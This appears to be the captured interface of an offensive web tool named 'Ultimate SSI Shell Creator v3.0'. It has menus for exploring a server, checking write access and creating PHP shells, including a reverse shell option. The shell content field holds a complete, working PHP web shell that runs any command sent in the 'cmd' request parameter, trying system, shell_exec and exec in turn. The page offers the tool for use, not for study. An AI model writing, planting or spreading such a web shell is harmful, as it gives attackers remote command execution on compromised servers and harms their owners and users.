🔮 Ultimate SSI Shell Creator v3.0
🏠 Home
📊 System Info
📝 Create Shell
🔧 Methods
✅ Check Write
📁 Explore
📝 Create PHP Shell
Shell Type:
Simple PHP Shell
Minimal PHP Shell
Advanced PHP Shell
Reverse Shell
File Name:
Directory:
Current Directory (./)
Parent Directory (../)
Root Parent (../../)
/tmp/
Custom Path
Custom Path:
Shell Content:
<?php /** * Simple PHP Shell * Usage: ?cmd=whoami */ if(isset($_REQUEST['cmd'])) { echo "<pre>"; if(function_exists('system')) { system($_REQUEST['cmd'] . " 2>&1"); } elseif(function_exists('shell_exec')) { echo shell_exec($_REQUEST['cmd'] . " 2>&1"); } elseif(function_exists('exec')) { exec($_REQUEST['cmd'] . " 2>&1", $output); echo implode("\n", $output); } else { echo "No execution function available"; } echo "</pre>"; } else { echo "Use ?cmd=command"; } ?>
🚀 Create Shell